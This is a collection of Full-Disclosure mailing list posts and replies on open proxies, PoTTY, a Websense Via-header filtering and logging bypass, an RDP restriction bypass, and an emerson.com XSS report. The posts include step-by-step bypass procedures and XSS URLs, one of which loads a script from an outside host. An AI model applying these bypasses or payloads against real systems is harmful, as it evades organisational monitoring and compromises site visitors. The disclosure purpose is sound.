Re: [Full-disclosure] Hacking in Schools
Wut? This isn't about golf? On 2/25/2014 1:39 PM, Brandon Perry wrote: I, for one, believe lumberjack skills are a must have for anyone entering the workforce today. The ability to hack trees down swiftly and efficiently is something i am not willing to train my employees to do. I fully expect our school systems to cover this in enough detail that, as an employer, I can expect recent graduates to hit the ground running. Just my 2c. Sent from a computer On Feb 25, 2014, at 8:33 AM, Pete Herzog li...@isecom.org wrote: How to teach hacking in school and open up education: https://opensource.com/education/14/2/teach-hacking-schools-open-education Sincerely, -pete. -- Pete Herzog - Managing Director - p...@isecom.org ISECOM - Institute for Security and Open Methodologies Need impartial, expert advice? Request a call: http://clarity.fm/peteherzog ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PoTTY v0.63 released
PoTTY is a re-branded PuTTY clone for Windows offering obfuscated-openssh (oossh) support (if you have to ask, you don't need it). This version simply adds the bug fixes made to Simon Tatham's PuTTY v0.63 earlier this month. No new features/capabilities were added. Download page: == http://www.mrhinkydink.com/potty63.htm Obfuscated-openssh: === https://github.com/brl/obfuscated-openssh Notes Stuff: == http://mrhinkydink.blogspot.com/2013/08/potty-063-teaser.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] McAfee Relay Server Product Installs Open Proxy On Consumer PCs
Earlier today I noticed I was getting a lot of TCP port 6515 proxies on The List (http://www.mrhinkydink.com/proxies.htm ) Curious, I checked one it and it gave me a VIA header of 1.1 Fran-PC (McAfee Relay Server 5.2.3) Then I took a peek at the database. Nearly 1900 of these things since December 1st, 2011. Although the name of the PC above is a dead giveaway that this is some sort of consumer product ([name-of-owner]-PC is the default Windows machine name created during setup), a quick check of the DNS names of these boxes confirms they are all on residential IP addresses. So what is McAfee Relay Server? I'm guessing it's one of those snarky products they stick you with whenever you buy a new PC. This makes sense, since December is a big month for new PCs. But why install it as an open proxy? If it's a security product I hope it's a honeypot. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS Vulnerability in www.emerson.com
That... ahem... particular company has had that particular page (/MCS/email.apsx) in one form or another for a long time, since the late 90s at least, when it was a cgi app. IIRC, at one time you could SPAM anyone through it, but they learned their lesson and now you can only SPAM the company's employees. Considering the business they're in (think SCADA related) this could be a Bad Thing. The XSS is just the icing on the cake. I find it interesting that they upgraded it to SharePoint. It's an in-house app, one of several. I believe the security model used to be no one knows the URL. I'm guessing you're a contractor for that particular company because, after all, no one knows the URL. On Mon, 2011-09-05 at 02:00 +0530, Madhur Ahuja wrote: One of the pages in Emerson site are rendering the query string parameter without any inspection. This makes it possible to inject malicious content as shown below: http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cimg% 20src='http://www.emerson.com/SiteCollectionImages/local/united-states/english/fastpath/INBDB%2020110225.jpg'%3E http://www.emerson.com/_layouts/MCS/Email.aspx?Title=%3Cscript%20src=% 22http://madhur.github.com/files/js/site.js%22%20type=% 22text/javascript%22%3E -- Madhur ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] China - the land of open proxies
In July, hundreds of Chinese proxies on port 8909 started showing up every day on public proxy lists. In August the daily numbers were in the thousands. Here is the list I collected during that period. There are 135K proxies in this file (text, tab delimited, ~8 megs). http://www.mrhinkydink.com/utmods/135k.txt You may want to right-click and save as. This is offered as data you may be able to use for forensic purposes or router block lists. Most of these proxies are currently offline. When they are online, they're very good proxies. I believe this is similar to the PPLiveVA issue with TCP port 9415 that I noted back in April. http://mrhinkydink.blogspot.com/2011/04/insecure-defaults-in-ppliveav-client.html New port 9415 proxies stopped showing up on proxy lists when 8909 began to take over, which leads me to believe this is the hot new media client (either Youku or QQ) in Chinese-speaking countries. --Mr. Hinky Dink walk like a mannequin roll like a tyre act on reaction dodge the Big Spud Fryer http://mrhinkydink.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Yet Another Chinese Multimedia Player Supplies Thousands Of Open Proxies
On Sun, 2011-08-07 at 16:27 -0400, valdis.kletni...@vt.edu wrote: On Sat, 06 Aug 2011 19:59:23 EDT, Mr. Hinky Dink said: 23,000+ showed up in July. Over 16,000 new ones in the first week of August. Somebody doesn't get it. http://mrhinkydink.blogspot.com/2011/08/tcp-port-8909-proxies.html See also... http://mrhinkydink.blogspot.com/2011/04/insecure-defaults-in-ppliveav-client.html Doesn't get it? You're making the rash assumption it's not intentional. You yourself say Government spooks and contractors take note: you can use these to stage your false flag attacks!. Now take it one step further - what if they're intentionally open so the Chinese gov't can launch an attack through them and claim it was somebody else pulling a false flag attack? You think that's too devious? Go read up on who financed the research that lead to TOR - and *why* they financed it. (tl;dr: US Gov. financed it, so the US spooks could more easily fly under the wire mixed in with all the other nefarious people using TOR. So yes, it's patriotic to use TOR so it's even harder to use traffic analysis to track down our spooks. :) There's always the possibility that *I* don't get it. Because I'm SOMEBODY dammit! So... are you a spook or a contractor? Or both? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Yet Another Chinese Multimedia Player Supplies Thousands Of Open Proxies
23,000+ showed up in July. Over 16,000 new ones in the first week of August. Somebody doesn't get it. http://mrhinkydink.blogspot.com/2011/08/tcp-port-8909-proxies.html See also... http://mrhinkydink.blogspot.com/2011/04/insecure-defaults-in-ppliveav-client.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Seeking info on CVE-2011-0348
See also http://www.cisco.com/warp/public/707/cisco-sa-20110126-csg2.shtml Cisco Bug ID CSCtk35917 If you or one of your budz had anything to do with this and are not encumbered by NDA, please contact me off-list (or on -- it's all good). This kind of thing is my specialty, so I have a professional interest. TIA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Did someone hack Dave Aitel's Twitt er account or is it an impostor?
Recent Tweets about http://dlvr.it/4lDy3, which is in Chinese (I think). And http://dlvr.it/4lDy3 which seems to be a security blog link trap (lots of crap that goes through linkbucks.com). http://twitter.com/daveaitel ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PoTTy (Obfuscated PuTTy) vulnerable to storm's DLL Hijacking Exploit
NAME: PoTTy v0.60 = VENDOR: Mr. Hinky Dink == PoTTy, an Open Source, modified version of Simon Tatham's PuTTy (Windows version, v0.60) for Bruce Leidl's Obfuscated-OpenSSH v5.2 server, has been demonstrated vulnerable to the recent Windows DLL hijacking exploit(s). PROOF OF CONCEPT See storm's (st...@gonullyourself.org) exploit code at http://www.exploit-db.com/exploits/14796/ VENDOR RESPONSE === WTF? How do I fix this? REMEDIATION === Stop running Windows. HISTORY === 08/27/2010 - Vendor notified 08/27/2010 - Vendor craps pance 08/27/2010 - Vendor decides any publicity is good publicity 08/27/2010 - Vendor publishes details LINKS: == This Notice: http://mrhinkydink.blogspot.com/2010/08/potty-dll-injection-vulnerability.html Vendor Response: http://proxyobsession.net/?p=1097 PoTTy Download Page: http://www.mrhinkydink.com/potty.htm Obfuscated-OpenSSH: http://github.com/brl/obfuscated-openssh c. MMX Mr. Hinky Dink ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Websense/ISA Via: Bypass Redux
discovered by mrhinkydink PRODUCT: Websense Enterprise EXPOSURE: Trivial Web Policy Bypass (III) LINK: http://mrhinkydink.blogspot.com/2010/08/websenseisa-via-bypass-redux.html SYNOPSIS On May 29, 2010 I demonstrated that by adding a Via: header to an HTTP request it is possible for a user to completely bypass filtering and monitoring in a Websense Enterprise 6.3.3/Microsoft ISA Server (2004 or 2006) proxy integration environment. This was addressed in Websense Knowledge Base article #5117. However, anyone familiar with the Via bypass technique would have noticed this remediation was insufficient. PROOF OF CONCEPT The following works in a Websense Enterprise system using the ISA Server integration product in a Cache Array Routing Protocol (CARP, sometimes referred to as CRAP) configuration, which requires at least two ISA servers. Assuming there are two ISA servers configured as per Websense Knowledge Base article #5117, one at IP address 10.10.0.1 and another at 10.10.0.2, perform the following: I. Install Firefox = 3.5 II. Configure Firefox to use one of the proxy servers in the CARP array (10.10.0.1). III. Obtain and install the Modify Headers plug-in by Gareth Hunt IV. Configure the plug-in to add a valid Via: header pointing to the other server in the array. Example: Via: 1.0 10.10.0.2 V. Browse to a filtered Web site VI. All content is allowed without monitoring or filtering PoC RESTRICTIONS All restrictions noted in the original Via Bypass article apply. See http://mrhinkydink.blogspot.com/2010/05/websense-633-via-bypass.html OTHER USES == Limited only by your imagination! You do have an imagination, don't you? See http://mrhinkydink.blogspot.com/2010/05/websense-633-via-bypass.html WORK-AROUNDS Install Hotfix 17 provided by Websense. HISTORY === 06/25/2010 - vendor notified 08/13/2010 - vendor releases Hotfix 17 08/18/2010 - PoC published c. MMX mrhinkydink http://mrhinkydink.blogspot.com http://proxyobsession.net ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] targetted SSH bruteforce attacks
Have you ever considered obfuscated-openssh? http://github.com/brl/obfuscated-openssh I have a modified version of PuTTY available for it... http://www.mrhinkydink.com/potty.htm Still... you should change the freakin' port. Original Message Subject: [Full-disclosure] targetted SSH bruteforce attacks From: Gary Baribault g...@baribault.net Date: Thu, June 17, 2010 7:48 am To: full-disclosure@lists.grok.org.uk Hello list, I have a strange situation and would like information from the list members. I have three Linux boxes exposed to the Internet. Two of them are on cable modems, and both have two services that are publicly available. In both cases, I have SSH and named running and available to the public. Before you folks say it, yes I run SSH on TCP/22 and no I don't want to move it to another port, and no I don't want to restrict it to certain source IPs. Both of these systems are within one /21 and get attacked regularly. I run Denyhosts on them, and update the central server once an hour with attacking IPs, and obviously also download the public hosts.deny list. These machines get hit regularly, so often that I don't really care, it's fun to make the script kiddies waste their time! But in this instance, only my home box is being attacked... someone is burning a lot of cycles and hosts to do a distributed dictionary attack on my one box! The named daemon is non recursive, properly configured, up to date and not being attacked. Is anyone else seeing this type of attack? Or is someone really targeting MY box? Thanks Gary Baribault Courriel: g...@baribault.net GPG Key: 0x685430d1 Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] targetted SSH bruteforce attacks
Point taken. However, my ulterior motive was in promoting obfuscated-openssh, which, IMHO, is an excellent and under-appreciated enhancement to openssh. Note that with iptables you can leave ssh on port 22 but have it answer on other ports. See http://proxyobsession.net/?p=869 Why anyone would want to do that is beyond me. Original Message Subject: Re: [Full-disclosure] targetted SSH bruteforce attacks From: Gary Baribault g...@baribault.net Date: Thu, June 17, 2010 8:44 am To: full-disclosure@lists.grok.org.uk I just knew that people would say that, and that's why I specified that I WANT to keep SSH on 22 .. it's fun to see the attacks, and it's interesting to see new types of attacks. The question here is whether anyone else is seeing such a targeted attack. Gary Baribault Courriel: g...@baribault.net GPG Key: 0x685430d1 Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass
Chaining downstream proxies to ISA and requiring Windows Integrated Auth has been an issue for a long time (it generally breaks the chain, so that fixes the bypass problem right there), but frankly I'm guessing. Windows Auth brings a lot of incompatibilities with it. I wouldn't recommend it unless it was absolutely required, but its proxy-chain-breaking properties are legendary. The ISA server will continue to log, even though Websense won't, so you do have that. But ISA won't filter, so you're back to square one. And comparing the two databases for discrepancies can get ugly. By the time you get around to comparing the databases, the damage has already been done. It becomes a forensics exercise at that point. What I think is going on here is either: A) The Websense ISA plug-in sees that the request has come in by proxy and assumes it has already been filtered by the originating proxy or... B) ISA sees the request has come in by proxy and therefore doesn't send the request to the Websense ISA plug-in for filtering. If it's B, then it's a Microsoft issue and it may never get fixed (and it becomes marketing bullet point for ISA Server TMG). If the same problem occurs in a SQUID integration of Websense 6.3.3, then it's definitely A. I have a feeling Websense fixed it in the 7.x series, so they're probably not motivated to fix it in 6.x. Again, I don't have the resources to test that theory (and I asked Dan Hubbard politely for a temporary license for research purposes). My hunch is they did fix it in 7.x because they pretty much ignored me after the first e-mail I sent back in October 2009. Original Message Subject: RE: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass From: Thor (Hammer of God) t...@hammerofgod.com Date: Sun, May 30, 2010 12:30 pm To: d...@mrhinkydink.com d...@mrhinkydink.com, full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk Adding Via: completely bypasses monitoring too?? That is bad. I've never used Websense, so pardon my ignorance, but this wouldn't apply to with ISA's native monitoring and logging, so I'm just curious about what's going on under the covers. Via: bypassing the filter is not good but bypassing monitoring (and presumably logging) is really bad. Nice find. I am curious as to what your thoughts are regarding Windows Auth as a mitigation. While it's nice that ISA could help solve a problem with Websense, I'm don't see how that would work. How would requiring auth solve Websense's inability to filter Via: headers? t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of d...@mrhinkydink.com Sent: Saturday, May 29, 2010 8:25 PM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass discovered by mrhinkydink PRODUCT: Websense Enterprise v6.3.3 EXPOSURE: Trivial Web Policy Bypass SYNOPSIS By adding a Via: header to an HTTP request it is possible for a user to completely bypass filtering and monitoring in a Websense Enterprise 6.3.3/Microsoft ISA Server (2004 or 2006) proxy integration environment. PROOF OF CONCEPT The following works in a Websense 6.3.3 Enterprise system using the ISA Server integration product and transparent authentication. It is assumed it will work with other proxy integration products, but this has not been tested. I. Install Firefox = 3.5 II. Obtain and install the Modify Headers plug-in by Gareth Hunt III. Configure the plug-in to add a valid Via: header to every request Example: Via: 1.1 VIAPROXY IV. Browse to a filtered Web site V. All content is allowed without monitoring PoC VIDEO! == http://www.youtube.com/watch?v=H520rQ8JOLY PoC RESTRICTIONS The Modify Headers plug-in does not work with SSL. However, in practice a user could browse to a so-called (by Websense) Proxy Avoidance Web site and use the SSL capabilities of the remote proxy. OTHER USES == Properly configured, a downstream SQUID proxy can send requests to the upstream ISA server and all requests will pass through without blocking or monitoring. No evidence of activity will be logged by Websense. This was in fact how this vulnerability was originally discovered. Considering the simplicity of the attack, the author suspects this bypass technique is already well-known in certain circles. Also, it is trivial to modify proxy-enabled Linux utilities to leverage this bypass. The author has recompiled (that is, HACKED) OpenVPN, connect-proxy, PuTTY, stunnel, and others to take advantage of this policy bypass. Obviously, the risk of undetected (by Websense, at least) covert tunnels is high in a vulnerable installation of this product. Linux platforms using this method in this specific environment will also enjoy bypassing Websense's transparent authentication requirement. WORK-AROUNDS For this
Re: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass
When you look at the MUSTs for Via in RFC 2616, there are only three. None of them seem to be applicable here. And, of course, nowhere does it say a client MUST NOT fake a Via header. ;-) So you have an assumption that if an HTTP request with a Via header passes through your device it must have gotten there legitimately and it must be treated accordingly. In other words, this trick may have untapped potential. Original Message Subject: Re: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass From: Christian Sciberras uuf6...@gmail.com Date: Sun, May 30, 2010 1:40 pm To: Thor (Hammer of God) t...@hammerofgod.com Cc: d...@mrhinkydink.com d...@mrhinkydink.com, full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk My first thought on this find was cool. However the more I think about this, the more I think there's something seriously amiss. I would assume that there is some inside code which specifically tells it to turn off everything when via is used? If this is so, what stops us from concluding this was some sort of backdoor? The only other reason for this would be them trying to support via but did a(n extremely) bad job about it. Cheers. Christian Sciberras On Sun, May 30, 2010 at 6:30 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: Adding Via: completely bypasses monitoring too?? That is bad. I've never used Websense, so pardon my ignorance, but this wouldn't apply to with ISA's native monitoring and logging, so I'm just curious about what's going on under the covers. Via: bypassing the filter is not good but bypassing monitoring (and presumably logging) is really bad. Nice find. I am curious as to what your thoughts are regarding Windows Auth as a mitigation. While it's nice that ISA could help solve a problem with Websense, I'm don't see how that would work. How would requiring auth solve Websense's inability to filter Via: headers? t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure- boun...@lists.grok.org.uk] On Behalf Of d...@mrhinkydink.com Sent: Saturday, May 29, 2010 8:25 PM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass discovered by mrhinkydink PRODUCT: Websense Enterprise v6.3.3 EXPOSURE: Trivial Web Policy Bypass SYNOPSIS By adding a Via: header to an HTTP request it is possible for a user to completely bypass filtering and monitoring in a Websense Enterprise 6.3.3/Microsoft ISA Server (2004 or 2006) proxy integration environment. PROOF OF CONCEPT The following works in a Websense 6.3.3 Enterprise system using the ISA Server integration product and transparent authentication. It is assumed it will work with other proxy integration products, but this has not been tested. I. Install Firefox = 3.5 II. Obtain and install the Modify Headers plug-in by Gareth Hunt III. Configure the plug-in to add a valid Via: header to every request Example: Via: 1.1 VIAPROXY IV. Browse to a filtered Web site V. All content is allowed without monitoring PoC VIDEO! == http://www.youtube.com/watch?v=H520rQ8JOLY PoC RESTRICTIONS The Modify Headers plug-in does not work with SSL. However, in practice a user could browse to a so-called (by Websense) Proxy Avoidance Web site and use the SSL capabilities of the remote proxy. OTHER USES == Properly configured, a downstream SQUID proxy can send requests to the upstream ISA server and all requests will pass through without blocking or monitoring. No evidence of activity will be logged by Websense. This was in fact how this vulnerability was originally discovered. Considering the simplicity of the attack, the author suspects this bypass technique is already well-known in certain circles. Also, it is trivial to modify proxy-enabled Linux utilities to leverage this bypass. The author has recompiled (that is, HACKED) OpenVPN, connect-proxy, PuTTY, stunnel, and others to take advantage of this policy bypass. Obviously, the risk of undetected (by Websense, at least) covert tunnels is high in a vulnerable installation of this product. Linux platforms using this method in this specific environment will also enjoy bypassing Websense's transparent authentication requirement. WORK-AROUNDS For this specific installation scenario (Websense 6.3.3 + ISA 2004/6 + transparent authentication), none are known. The following may work: * Use Windows Integrated Authentication on the ISA Server * Upgrade to Websense 7.x * Do not use a proxy integration product HISTORY === 10/09/2009 - vendor notified 05/29/2010 - PoC published URL === http://mrhinkydink.blogspot.com/2010/05/websense-633-via-bypass.html c. MMX mrhinkydink ___ Full-Disclosure -
Re: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass
I wouldn't call breaking proxy chaining mitigation, either. More like a quick fix, if and only if it works. Or maybe you'd call it a work-around, which is what I called it in the first place. No, there's nothing at all in the Websense database indicating you went to playboy.com. You are home free until someone decides to look at the ISA logs (if logging is turned on) and finds it in there. But you spent good money on Websense and want pretty reports with charts and colors and your company logo, right? In that way, this is much better than my 2007 User-Agent hack (now fixed). Your indiscretions were logged, but not blocked or categorized. Now, as far as stripping out the Via header at ISA goes, per RFC 2616... Multiple Via field values represents each proxy or gateway that has forwarded the message. Each recipient shout MUST /shout append its information such that the end result is ordered according to the sequence of forwarding applications. MUST append... does not mean, in my understanding of the English language (and RFC 2119), delete the downstream device's Via header. If you do anything other than append... (which you MUST do), you're breaking the RFC. And if you go around breaking RFCs, you're BAD, m'kay? ;-) Link to 2007 User-Agent hack, just in case you missed it... http://mrhinkydink.blogspot.com/2007/12/websense-policy-filtering-bypass.html Original Message Subject: RE: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass From: Thor (Hammer of God) t...@hammerofgod.com Date: Sun, May 30, 2010 2:19 pm To: d...@mrhinkydink.com d...@mrhinkydink.com Cc: full-disclosure@lists.grok.org.uk full-disclosure@lists.grok.org.uk Ah, authenticating at the web proxy *chain*. That wasn't intuitive from the original post... breaking the chain by requiring an auth mechanism that the downstream proxy doesn't support really isn't a mitigation, but now I understand the basis of the statement. But, if they fixed it in 7.x, then it obviously wasn't B below. ISA wouldn’t work like that anyway. It doesn't send requests to the plug-in. You either use a filter or you don't. For instance, if I simply used the web proxy filter instead, I could filter for Via: and block it. But then again, if I had to do that, I wouldn't have purchased Websense but rather handled all my blocking at ISA. Not that it really matters to me personally, but I am curious - is the logging of the request completely dropped, or is it just not logged as a filtered request. IOW, if I'm behind the downstream proxy, and I go to playboy.com, Web sense logs the request and part of the logging is that it was filtered or blocked or something. But if I set Via in the downstream proxy (or at the client via something like firefox) and go to playboy.com, not only do I reach the site, but there is no record whatsoever that I went to playboy? If it is the latter, then they would HAVE to fix it in 6.3.3 IMO. t -Original Message- From: d...@mrhinkydink.com [mailto:d...@mrhinkydink.com] Sent: Sunday, May 30, 2010 10:47 AM To: Thor (Hammer of God) Cc: full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass Chaining downstream proxies to ISA and requiring Windows Integrated Auth has been an issue for a long time (it generally breaks the chain, so that fixes the bypass problem right there), but frankly I'm guessing. Windows Auth brings a lot of incompatibilities with it. I wouldn't recommend it unless it was absolutely required, but its proxy-chain-breaking properties are legendary. The ISA server will continue to log, even though Websense won't, so you do have that. But ISA won't filter, so you're back to square one. And comparing the two databases for discrepancies can get ugly. By the time you get around to comparing the databases, the damage has already been done. It becomes a forensics exercise at that point. What I think is going on here is either: A) The Websense ISA plug-in sees that the request has come in by proxy and assumes it has already been filtered by the originating proxy or... B) ISA sees the request has come in by proxy and therefore doesn't send the request to the Websense ISA plug-in for filtering. If it's B, then it's a Microsoft issue and it may never get fixed (and it becomes marketing bullet point for ISA Server TMG). If the same problem occurs in a SQUID integration of Websense 6.3.3, then it's definitely A. I have a feeling Websense fixed it in the 7.x series, so they're probably not motivated to fix it in 6.x. Again, I don't have the resources to test that theory (and I asked Dan Hubbard politely for a temporary license for research purposes). My hunch is they did fix it in 7.x because they pretty much ignored me after the first e-mail I sent back in October 2009. Original Message Subject: RE: [Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass From: Thor (Hammer of God) Date: Sun, May 30, 2010 12:30
[Full-disclosure] Websense Enterprise 6.3.3 Policy Bypass
discovered by mrhinkydink PRODUCT: Websense Enterprise v6.3.3 EXPOSURE: Trivial Web Policy Bypass SYNOPSIS By adding a Via: header to an HTTP request it is possible for a user to completely bypass filtering and monitoring in a Websense Enterprise 6.3.3/Microsoft ISA Server (2004 or 2006) proxy integration environment. PROOF OF CONCEPT The following works in a Websense 6.3.3 Enterprise system using the ISA Server integration product and transparent authentication. It is assumed it will work with other proxy integration products, but this has not been tested. I. Install Firefox = 3.5 II. Obtain and install the Modify Headers plug-in by Gareth Hunt III. Configure the plug-in to add a valid Via: header to every request Example: Via: 1.1 VIAPROXY IV. Browse to a filtered Web site V. All content is allowed without monitoring PoC VIDEO! == http://www.youtube.com/watch?v=H520rQ8JOLY PoC RESTRICTIONS The Modify Headers plug-in does not work with SSL. However, in practice a user could browse to a so-called (by Websense) Proxy Avoidance Web site and use the SSL capabilities of the remote proxy. OTHER USES == Properly configured, a downstream SQUID proxy can send requests to the upstream ISA server and all requests will pass through without blocking or monitoring. No evidence of activity will be logged by Websense. This was in fact how this vulnerability was originally discovered. Considering the simplicity of the attack, the author suspects this bypass technique is already well-known in certain circles. Also, it is trivial to modify proxy-enabled Linux utilities to leverage this bypass. The author has recompiled (that is, HACKED) OpenVPN, connect-proxy, PuTTY, stunnel, and others to take advantage of this policy bypass. Obviously, the risk of undetected (by Websense, at least) covert tunnels is high in a vulnerable installation of this product. Linux platforms using this method in this specific environment will also enjoy bypassing Websense's transparent authentication requirement. WORK-AROUNDS For this specific installation scenario (Websense 6.3.3 + ISA 2004/6 + transparent authentication), none are known. The following may work: * Use Windows Integrated Authentication on the ISA Server * Upgrade to Websense 7.x * Do not use a proxy integration product HISTORY === 10/09/2009 - vendor notified 05/29/2010 - PoC published URL === http://mrhinkydink.blogspot.com/2010/05/websense-633-via-bypass.html c. MMX mrhinkydink ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible RDP vulnerability
As far as RDP is concerned, it's much simpler (and more fun!) to host an Evil RDP Server than it is to hack into one. There is no end to the shenanigans you can create or the havoc you can wreak, if you're into that kind of thing (just sayin'... as a Big Time Security Professional™, I'm not). For instance, this low quailty, seldom seen, crappy video (barely) shows how you can get a virus/Trojan/worm/etc. if you are insane enough to attach your local drives to an untrusted RDP server (the popup at the end is the AV going off). http://www.youtube.com/watch?v=UwhqJSmYm_4 EXTRA CREDIT: devise a Group Policy that will prevent users from attaching their local drives to a remote RDP server. - Original Message - From: wicked clown To: Thor (Hammer of God) Cc: Full-Disclosure@lists.grok.org.uk Sent: Saturday, March 27, 2010 7:39 AM Subject: Re: [Full-disclosure] Possible RDP vulnerability I think we are two different pages :) what I was trying to show if you have a group policy that will only run a certain applications for example notepad.exe, the user is unable to access my computer, run or the start button or any other application. There would be a shortcut on the desktop for just notepad.exe for the user to execute. / ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible RDP vulnerability
In your case, had you answered the question correctly I would have promised to never (again) blog about you arguing with Craig S. Wright. However, it was a trick question. There is no way to do it with Group Policy (at least not with XP and Server 2003... maybe they changed that in Windows Vis7a and Server 2008, but I really haven't kept up with the tech). - Original Message - From: Thor (Hammer of God) t...@hammerofgod.com To: Mr. Hinky Dink d...@mrhinkydink.com; Full-Disclosure@lists.grok.org.uk Sent: Saturday, March 27, 2010 12:09 PM Subject: RE: [Full-disclosure] Possible RDP vulnerability Oh, sorry I read the question wrong. Just don't allow them to attach their local drives. Simple. Still, what do I win? t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Possible RDP vulnerability
There is a section in RCP-Tcp Properties on the server under Environment for Do not allow an initial program to be launched. Always show the desktop. - Original Message - From: wicked clown To: Full-Disclosure@lists.grok.org.uk Sent: Friday, March 26, 2010 5:04 AM Subject: [Full-disclosure] Possible RDP vulnerability Hi Guys, I think I possible may have found a vulnerability with using RDP / Terminal services on windows 2003. If you lock down a server and only allow users who connect to your RDP connection to run certain applications, users can bypass this and run ANY application they want. You can do this by modifying the RDP profile / shortcut and add your application to the alternate shell and the shell working directory. When the user connects now to the RDP server the banned application will execute upon logging on even though the user isn’t allowed to execute the application if the user logs on normally. This doesn’t work with cmd.exe but I have been able to execute internet explorer, down a modified cmd version, modify the RDP profile to execute the new cmd and it works like a charm. I have only been able to tested this on windows 2003 using a local policy and works like a treat. Even in the wild! I have done a quick basic video which can been seen here; http://www.tombstone-bbs.co.uk/v1d30z/rdp-hack2.swf Instead of modifying the RDP profile, I just added my application to the program tab.. I know the video is crappy but it’s just meant to give you an idea what I am talking about :) So in short, if anybody can access your server via RDP they are NOT restricted by the policy. I would be interested in any feed back about this possible exploit / vulnerability even if you don’t think it is.. or even better if someone knows how to defend againest it!! LOL! :) Cheers Wicked Clown. -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The Hinky Dink Top 10 Koobface Infested Shitholes Report
